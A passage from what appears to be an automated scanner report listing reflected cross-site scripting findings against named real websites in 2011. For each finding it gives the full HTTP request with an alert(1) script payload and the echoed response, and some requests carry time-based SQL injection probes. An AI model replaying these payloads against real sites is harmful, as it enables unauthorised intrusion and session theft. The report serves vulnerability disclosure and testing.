The value of the message request parameter is copied into the HTML document as plain text between tags. The payload 8a741<script>alert(1)</script>c3baafbd359 was submitted in the message parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /default.asp?message=Invalid%20Username%20and%20or%20Password8a741<script>alert(1)</script>c3baafbd359 HTTP/1.1
Host: login.vindicosuite.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSSSCTDAT=ANMPJKACDGDFKLLGFIHDPGOP

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2335
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:21:14 GMT


<html>

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
   <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
   
   <link rel="stylesheet" type="text/css" hre
...[SNIP]...
<td width="247" height="33" colspan="2">Invalid Username and or Password8a741<script>alert(1)</script>c3baafbd359</td>
...[SNIP]...

5.92. http://login.vindicosuite.com/default.asp [message parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://login.vindicosuite.com
Path:   /default.asp

Issue detail

The value of the message request parameter is copied into the HTML document as plain text between tags. The payload 51889<script>alert(1)</script>3e60f2b813cb8e4d1 was submitted in the message parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /default.asp?message=Invalid%20Username%20and%20or%20Password51889<script>alert(1)</script>3e60f2b813cb8e4d1&password=%27;WAITFOR%20DELAY%20%270:0:0%27-- HTTP/1.1
Referer: http://login.vindicosuite.com/vindico_dynamic.asp
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: login.vindicosuite.com
Cookie: ASPSESSIONIDSSSCTDAT=CMNPJKACHIDMMJGMMEKHFGND
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 2341
Content-Type: text/html
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 17:32:21 GMT


<html>

<head>
   <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
   <META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
   
   <link rel="stylesheet" type="text/css" hre
...[SNIP]...
<td width="247" height="33" colspan="2">Invalid Username and or Password51889<script>alert(1)</script>3e60f2b813cb8e4d1</td>
...[SNIP]...

5.93. http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com/gadgets/ifr [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Path:   /gadgets/ifr

Issue detail

The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 953fa%0aalert(1)//44bb86f9bed was submitted in the url parameter. This input was echoed as 953fa
alert(1)//44bb86f9bed
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /gadgets/ifr?url=http://www.google.com/friendconnect/gadgets/members.xml953fa%0aalert(1)//44bb86f9bed&container=peoplesense&parent=http://allatsea.net/&mid=0&view=profile&d=0.558.7&lang=en&communityId=14672211859858017590&caller=http://allatsea.net/ HTTP/1.1
Host: r1rk9np7bpcsfoeekl0khkd2juj27q3o-a-fc-opensocial.googleusercontent.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 Bad Request
P3P: CP="CAO PSA OUR"
Content-Type: text/html; charset=UTF-8
Date: Fri, 06 May 2011 21:06:58 GMT
Expires: Fri, 06 May 2011 21:06:58 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 126

Unable to retrieve spec for http://www.google.com/friendconnect/gadgets/members.xml953fa
alert(1)//44bb86f9bed
. HTTP error 400

5.94. http://sales.liveperson.net/visitor/addons/deploy.asp [site parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://sales.liveperson.net
Path:   /visitor/addons/deploy.asp

Issue detail

The value of the site request parameter is copied into a JavaScript rest-of-line comment. The payload ec21a%0aalert(1)//7e817ac7b43 was submitted in the site parameter. This input was echoed as ec21a
alert(1)//7e817ac7b43
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /visitor/addons/deploy.asp?site=56727252ec21a%0aalert(1)//7e817ac7b43&d_id=software-soa HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.dynamicperimeter.com/download/Intel_Expressway_Tokenization_Broker/?partnerref=googletokenization&gclid=CMLLqMvV1KgCFUSo4AodlBcAgw
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=16601209214853,d=1303177644; _mkto_trk=id:220-ESA-932&token:_mch-liveperson.net-1304643823223-44198

Response

HTTP/1.1 500 Internal Server Error
Date: Sat, 07 May 2011 01:21:46 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 459
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSSQSQTAC=IOMLOCHABCHAGDICAICNNINC; path=/
Cache-control: private

//Plugins for site 56727252ec21a
alert(1)//7e817ac7b43

<font face="Arial" size=2>
<p>Server.MapPath()</font> <font face="Arial" size=2>error 'ASP 0174 : 80004005'</font>
<p>
<font face="Arial" size=
...[SNIP]...

5.95. https://secure.trust-guard.com/index.php [txtEmail parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://secure.trust-guard.com
Path:   /index.php

Issue detail

The value of the txtEmail request parameter is copied into the HTML document as plain text between tags. The payload 16a1d<script>alert(1)</script>7c0a4356b71 was submitted in the txtEmail parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

POST /index.php HTTP/1.1
Referer: https://secure.trust-guard.com/index.php
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: secure.trust-guard.com
Cookie: PHPSESSID=todvqp9ae2pb55so66dlntmpe4
Accept-Encoding: gzip, deflate
Content-Length: 38

btnLogin=Submit&txtEmail=16a1d<script>alert(1)</script>7c0a4356b71&txtPassword=

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 00:57:38 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID ADMa OPTa OUR NOR"
Content-Length: 5133
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>

<script type="text/ja
...[SNIP]...
<span id='lblResult' style='color:red; ' >We could not find the account 16a1d<script>alert(1)</script>7c0a4356b71.</span>
...[SNIP]...

5.96. http://snas.nbcuni.com/snas/api/getRemoteDomainCookies [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://snas.nbcuni.com
Path:   /snas/api/getRemoteDomainCookies

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f2acb<script>alert(1)</script>b1a3aa827ff was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /snas/api/getRemoteDomainCookies?callback=__nbcsnasadops.doSCallbackf2acb<script>alert(1)</script>b1a3aa827ff HTTP/1.1
Host: snas.nbcuni.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/local/Man-Charged-With-Threatening-Malloy-On-Facebook-121424684.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E2E4E0051D3A52-6000010BE0167355[CE]

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 22:38:48 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8b DAV/2 mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Set-Cookie: JSESSIONID=28C39803DCD2F9DBB5A42349EF724DCA; Path=/
Cache-Control: max-age=10
Expires: Sat, 07 May 2011 22:38:58 GMT
Content-Length: 137
Content-Type: text/html

__nbcsnasadops.doSCallbackf2acb<script>alert(1)</script>b1a3aa827ff({ "cookie":{"s_vi":"[CS]v1|26E2E4E0051D3A52-6000010BE0167355[CE]"}});

5.97. http://store.kentuckyderby.com/cart.php [rs parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://store.kentuckyderby.com
Path:   /cart.php

Issue detail

The value of the rs request parameter is copied into the HTML document as plain text between tags. The payload 98ed9<script>alert(1)</script>71d28279f0b was submitted in the rs parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cart.php?m=product_detail&p=221&catID=37&rs=displayOptionImage98ed9<script>alert(1)</script>71d28279f0b&rst=&rsrnd=1304820549320&rsargs%5B%5D=829 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: store.kentuckyderby.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 21:09:17 GMT
Server: Apache/2.2.3 (CentOS) PHP/5.1.6 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5
X-Powered-By: PHP/5.1.6
Set-Cookie: digiSHOPID=5e3623b0eb6e8b94e1566139ca496cd9; path=/
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sat, 07 May 2011 21:09:17 GMT
Cache-Control: no-cache, must-revalidate
Content-Length: 76
Connection: close
Content-Type: text/html


-:displayOptionImage98ed9<script>alert(1)</script>71d28279f0b not callable

5.98. https://subscribe.haymarketmedia.com/scm/ [form parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://subscribe.haymarketmedia.com
Path:   /scm/

Issue detail

The value of the form request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4039d"%3balert(1)//8ac54b4c9a7 was submitted in the form parameter. This input was echoed as 4039d";alert(1)//8ac54b4c9a7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /scm/?form=4039d"%3balert(1)//8ac54b4c9a7 HTTP/1.1
Host: subscribe.haymarketmedia.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=xgwhobb5t5qhqnfgg1yyct45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Fri, 06 May 2011 21:49:28 GMT
Content-Length: 5494


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >
<head><link href="Pubs/SC
...[SNIP]...
<script type="text/javascript">
var pageTracker = _gat._getTracker("UA-1290429-25");
pageTracker._initData();
pageTracker._trackPageview("scm_4039d";alert(1)//8ac54b4c9a7_IS1105");
</script>
...[SNIP]...

5.99. http://support.expedia.com/app/answers/list/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://support.expedia.com
Path:   /app/answers/list/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cdc4"><a>ac9888ba52a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /app/answers/list/?1cdc4"><a>ac9888ba52a=1 HTTP/1.1
Host: support.expedia.com
Proxy-Connection: keep-alive
Referer: http://support.expedia.com/app/home/uurl/http%3A%2F%2Fwww.expedia.com%2Fpub%2Fagent.dll%3Fqscr%3Dflex%26subm%3D1%26city%3DAUS%26citd%3DDTW%26date1%3D%26mnth%3D5%2F1%2F2011%26rgst%3D1%26rged%3D10%26fxst%3D0%26load%3D1%26cAdu%3D1%26rfrr%3D-429%3F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipsnf3=v.3|US|1|511|washington; MC1=GUID=80312807C795402E93C5016D2A2A3E1B; COOKIECHECK=1; aspp=v.1,0||||||||||||; s_vi=[CS]v1|26E23BA0850106CA-6000010280013092[CE]; bn_u=5368708931669622224; U9Z5=3JobJP3Sc0j1DW1jnIUl_HAiBkCEBwVqjg-T9-jxLszF1k_aJfr34tg; jscript=1; s1=`user=v.8,0,EX01528414FE$F4$B5202000X$27$E96$32i$A00$32i$A00$32i$A001000$31000$1E310$2302!50$EDIs$A8$FB$27$95$E4$82$AB$89$FB!e02000`131; p1=`tpid=v.1,1`accttype=v.2,3,1,EX01833E44F8$E8$24$DD$0C$AB$A2$18$37$25$18$F1$B6$8Ak$16$E6$24i$5B$39$8B$91H`linfo=v.4,|0|0|255|1|0||||||||0|0|0||0|0|0|-1|-1`airp=v.1,AUS`gacct=v.1,1,215819496`188; cp_session=UylSJgVxACRUPAJyAGoEaQRCDBEAA1FsA3EJOlZ2AngBcwR4ACYFPAF7WS1QIlIhACADPQd2VW4AJgM5ASBUdARyXyIBMAUSBHEIMwZEBCJTYFJCBXUAcVRxAn4ANgR9BHAMOwAxUWwDZAl%2FVjcCOwE8BCgANgVAAXBZelA1UnEAYAMXBzVVMwBhAz8BIFQuBGZfawFvBXYEZwhHBnMEdFMxUnYFJwA1VEICNgA%2FBGAEeAx7AGdRMwN2CSRWNgI5AXQEPgBABTcBJVk9UGFSNwA7AyUHLVVxADcDFQEVVFUEUV8iATEFZQQ3CGgGdgRjU3dSNwVGAEJUUgIHAHYENwQ2DDoANFFxA2AJYFZxAmcBFQQoADYFMAFtWWFQI1I8AHcDYgcQVWEAIQNjARJUMQQnXzUBRQVhBGQIMAYzBCJTYFIyBXAAYVR1AiQAdgQ2BEQMbwBwUTcDMwkjVjMCMQE1BCgANwVCATFZP1ByUmYAZAM3ByxVJwBwA3QBZ1REBDJfIgExBWUEOAhuBmMEY1N3UjcFRgA3VCMCYgBlBGYEQQw6ACBRIAM2CRVWZQJxAWMEOwB2BWABcll9UHJSZwAWA3wHYFVmAD0DdAFnVEYEIF96AS8FcQQxCCMGOAQlUw5SKwVxAGNUdQIjADoEagRuDAIAelFJAzYJH1YkAg4BEgQ1ADEFZAFFWUVQB1ICAD8DPQdkVTUAcwNsAWlUIgR%2F; supportsurvey=1; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3DundefinedtoJSONString%253Dfunction%252520%252528%252529%25257Bvar%252520a%25253D%25255B%252522%25257B%252522%25255D%25252Cb%25252Ck%25252Cv%25253Bfunction%252520p%252528s%252529%25257Bif%252528b%252529%25257Ba.push%252528%252522%25252C%252522%252529%25253B%25257D%25250Aa.push%252528k.toJSONString%252528%252529%25252C%252522%25253A%252522%25252Cs%252529%25253Bb%25253Dtrue%25253B%25257D%25250Afor%252528k%252520in%252520this%252529%25257Bif%252528this.hasOwnProperty%252528k%252529%252529%25257Bv%25253Dthis%25255Bk%25255D%25253Bswitch%252528typeof%252520v%252529%25257Bcase%252522object%252522%25253Aif%252528v%252529%25257Bif%252528typeof%252520v.toJSONString%25253D%25253D%25253D%252522function%252522%252529%25257Bp%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257Delse%25257Bp%252528%252522null%252522%252529%25253B%25257D%25250Abreak%25253Bcase%252522string%252522%25253Acase%252522number%252522%25253Acase%252522boolean%252522%25253Ap%252528v.toJSONString%252528%252529%252529%25253B%25257D%25257D%25257D%25250Aa.push%252528%252522%25257D%252522%252529%25253Breturn%252520a.join%252528%252522%252522%252529%25253B%25257D%2526function%2520%2528%2529%257Bvar%2520a%253D%255B%2522%257B%2522%255D%252Cb%252Ck%252Cv%253Bfunction%2520p%2528s%2529%257Bif%2528b%2529%257Ba.push%2528%2522%252C%2522%2529%253B%257D%250Aa.push%2528k.toJSONString%2528%2529%252C%2522%253A%2522%252Cs%2529%253Bb%253Dtrue%253B%257D%250Afor%2528k%2520in%2520this%2529%257Bif%2528this.hasOwnProperty%2528k%2529%2529%257Bv%253Dthis%255Bk%255D%253Bswitch%2528typeof%2520v%2529%257Bcase%2522object%2522%253Aif%2528v%2529%257Bif%2528typeof%2520v.toJSONString%253D%253D%253D%2522function%2522%2529%257Bp%2528v.toJSONString%2528%2529%2529%253B%257D%257Delse%257Bp%2528%2522null%2522%2529%253B%257D%250Abreak%253Bcase%2522string%2522%253Acase%2522number%2522%253Acase%2522boolean%2522%253Ap%2528v.toJSONString%2528%2529%2529%253B%257D%257D%257D%250Aa.push%2528%2522%257D%2522%2529%253Breturn%2520a.join%2528%2522%2522%2529%253B%257D%253DtoJSONString%3B

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:53:03 GMT
Server: Apache
P3P: policyref="http://support.expedia.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV"
Set-Cookie: cp_session=VS9RJQx4ByMBaVcnVT8BbAFHDBFdXgY7AnBaaVZ2UigBc1IuAyUAOQF7ViIGdAh7UXFSbAFwADsAJlVvByYGJgN1AH0HNgUSUSQEPwZEAyVVZlFBDHwHdgEkVytVYwF4AXUMO11sBjsCZVosVjdSawE8Un4DNQBFAXBWdQZjCCtRMVJGATMAZgBhVWkHJgZ8A2EANAdpBXZRMgRLBnMDc1U3UXUMLgcyARdXY1VqAWUBfQx7XToGZAJ3WndWNlJpAXRSaANDADIBJVYyBjcIbVFqUnQBKwAkADdVQwcTBgcDVgB9BzcFZVFiBGQGdgNkVXFRNAxPB0UBB1dSVSMBMgEzDDpdaQYmAmFaM1ZxUjcBFVJ%2BAzUANQFtVm4GdQhmUSZSMwEWADQAIVU1BxQGYwMgAGoHQwVhUTEEPAYzAyVVZlExDHkHZgEgV3FVIwEzAUEMb10tBmACMlpwVjNSYQE1Un4DNABHATFWMAYkCDxRNVJmASoAcgBwVSIHYQYWAzUAfQc3BWVRbQRiBmMDZFVxUTQMTwcwAXZXN1UwAWMBRAw6XX0GdwI3WkZWZVIhAWNSbQN1AGUBclZyBiQIPVFHUi0BZgAzAD1VIgdhBhQDJwB0BycFbFEwBG4GZgNjVWBRWwwpBz8Bb1dkVTgBYQFmDGddMAZqAjxaYFY1UjEBY1I6AzoAMgEiVjoGZwhvUW9ScwE3AHwAKFUlBzcGcAM%2FAHoHWQV8UXIEaAZxA3NVPVFoDGUHXQF8V0lVNQFOAXUMBF1LBmoCMVpgVhFSTgEBUg0DagBvATBWYQZ2CDNRPlIiAS8%3D; path=/
RNT-Time: D=3309637 t=1304722383037218
RNT-Machine: 02
Vary: Accept-Encoding
X-Cnection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 95354


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:rn="http://schemas.rightn
...[SNIP]...
<a class = "noIntercept" href="/app/answers/list/?1cdc4"><a>ac9888ba52a=1/kw/" >
...[SNIP]...

5.100. http://syndication.mmismm.com/mmtnt.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndication.mmismm.com
Path:   /mmtnt.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe082'%3balert(1)//d9fdfca37be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fe082';alert(1)//d9fdfca37be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /mmtnt.php?mm_pub=7348&fe082'%3balert(1)//d9fdfca37be=1 HTTP/1.1
Host: syndication.mmismm.com
Proxy-Connection: keep-alive
Referer: http://www.nbcconnecticut.com/news/local/Man-Charged-With-Threatening-Malloy-On-Facebook-121424684.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: U=ZGlLsPa1SrWPX6bF4lGsUg--

Response

HTTP/1.1 200 OK
Date: Sat, 07 May 2011 22:38:39 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR BUS COM NAV"
Set-Cookie: U=ZGlLsPa1SrWPX6bF4lGsUg--; expires=Sat, 07-May-2016 04:38:39 GMT; path=/; domain=.mmismm.com
Content-Length: 458
Content-Type: text/javascript

document.write('<script type="text/javascript">var D=new Date();var Z=D.getTimezoneOffset();var R="";if(typeof document.referrer!=="undefined"){R="&ref="+encodeURIComponent(document.referrer);}</'+'sc
...[SNIP]...
<script type="text/javascript" src="http://syndication.mmismm.com/two.php?mm_pub=7348&fe082';alert(1)//d9fdfca37be=1&origin='+encodeURIComponent(document.URL)+'&tzos='+Z+R+'&cb='+Math.floor(Math.random()*0xffffffff)+'">
...[SNIP]...

5.101. http://tours.sapha.com/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tours.sapha.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bfe24"><script>alert(1)</script>d23c10e9ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?scs_sid=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+&scs_tid=1488&bfe24"><script>alert(1)</script>d23c10e9ae=1 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:52:32 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 3378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
scs_tsu=aHR0cDovL2FwcHMuc2FwaGEuY29tL2hvb2t0b3VyL3RvdXJzZXJ2aWNlLnBocA%3D%3D&scs_tourid=1488&scs_ac=2546&scs_purl=http://tours.sapha.com/?scs_sid=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+&scs_tid=1488&bfe24"><script>alert(1)</script>d23c10e9ae=1">
...[SNIP]...

5.102. http://tours.sapha.com/ [scs_sid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tours.sapha.com
Path:   /

Issue detail

The value of the scs_sid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d405"><script>alert(1)</script>80fbcfd4b8c was submitted in the scs_sid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?scs_sid=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+3d405"><script>alert(1)</script>80fbcfd4b8c&scs_tid=1488 HTTP/1.1
Host: tours.sapha.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sapha_tst_2546=TRUE; sapha_tst_2546=TRUE; sapha_2546_1=62715%7C35764%7C31540%7C2011-04-22+15%3A37%3A56; sapha_tst_1=TRUE; sapha_1_19=108127%7C2674799%7C2668748%7C2011-04-22+20%3A01%3A46

Response

HTTP/1.1 200 OK
Date: Fri, 06 May 2011 22:13:28 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 3458

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/
...[SNIP]...
hvars" value="scs_tsu=aHR0cDovL2FwcHMuc2FwaGEuY29tL2hvb2t0b3VyL3RvdXJzZXJ2aWNlLnBocA%3D%3D&scs_tourid=1488&scs_ac=2546&scs_purl=http://tours.sapha.com/?scs_sid=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+3d405"><script>alert(1)</script>80fbcfd4b8c&scs_tid=1488">
...[SNIP]...

5.103. http://tours.sapha.com/ [scs_tid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
